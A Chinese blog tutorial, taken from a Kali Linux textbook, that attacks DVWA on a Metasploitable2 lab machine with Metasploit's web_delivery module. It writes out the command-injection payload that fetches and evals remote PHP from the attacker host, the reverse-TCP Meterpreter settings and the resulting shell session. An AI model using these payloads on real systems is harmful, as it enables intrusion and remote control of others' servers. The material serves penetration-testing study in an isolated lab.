-
使用Kali Linux Metasploit 对WEB应用进行攻击 以DVWA为例
说明
按照《Kali Linux2 网络渗透测试实践指南 第二版 》第七章操作
仅供学习讨论使用,请勿进行非法操作
环境准备
“邪灵工作室“公众号”下载作者提供的 Metasploitable2 虚拟机
到kali 官网下载对应虚拟机并完成安装
上述虚拟机在VM Ware中打开步骤
确认攻击机所在网络信息
ifconfig- 1
可以看出本机ip地址为 192.168.229.133确认所在网络存活主机信息
nmap 192.168.229.0/24- 1
可以看出 192.168.229.134存活,也就是Metasploitable2 虚拟机
网页访问DVWA
Metasploitable2 虚拟机预装了DVWA,直接在kali 攻击机,浏览器地址输入 192.168.229.134
用户名admin, 密码password
把security安全等级设为low
打开Command Execution
打开Metasploit
msfconsole- 1
使用web_delivery模块
search web_delivery- 1
使用第2个,ID 为1 的exploit模块msf6 > use 1- 1
可以看到不止一种语言支持,所以切换到PHP的对应攻击环境下 (DVWA基于PHP实现)msf6 exploit(multi/script/web_delivery) > set target 1 target => 1 msf6 exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf6 exploit(multi/script/web_delivery) > set LHOST 192.168.229.133 LHOST => 192.168.229.133- 1
- 2
- 3
- 4
- 5
- 6
运行
提示告诉我们需要在目标网页上输入php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.229.133:8080/s1JewPn81KZ', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"- 1
但是实际运行后却报错,根据错误修改上述参数如下,可以成功
图中红色实际为之前报错留下的,不影响,这时候切回Kali127.0.0.1 | php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.229.133:8080/s1JewPn81KZ'));"- 1
控制
在浏览器旋转的时候,回到Kali主机内可以看到木马传送到DVWA所在机器使用sessions指令获取当前建立的session信息,从而进入控制,sysinfo获取DVWA所在主机信息
msf6 exploit(multi/script/web_delivery) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter php/linux www-data @ metasploitable 192.168.229.133:4444 -> 192.168.229.134:48700 (192.168.229.134) msf6 exploit(multi/script/web_delivery) > getuid [-] Unknown command: getuid msf6 exploit(multi/script/web_delivery) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : metasploitable OS : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 Meterpreter : php/linux- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
结束! -
相关阅读:
Direct3D纹理映射
关于个体工商户的15个财税要点,你清楚吗?
c++学习27qt(三)Qt自定义控件封装,事件处理,绘画和文件读写
SAP和APS系统订单BOM核对(SAP配置BOM攻略九)
给Python项目创建一个虚拟环境(enev)
pytorch-过拟合&欠拟合
回溯-求出数组的所有子序列【学习算法】
【附源码】计算机毕业设计JAVA智能社区管理系统
C/C++教程 从入门到精通《第二十四章》——Qt制作天气预报
【Unity】Unity常用类:向量Vector3、四元数Quaternion
- 原文地址:https://blog.csdn.net/xujing19920814/article/details/127137770
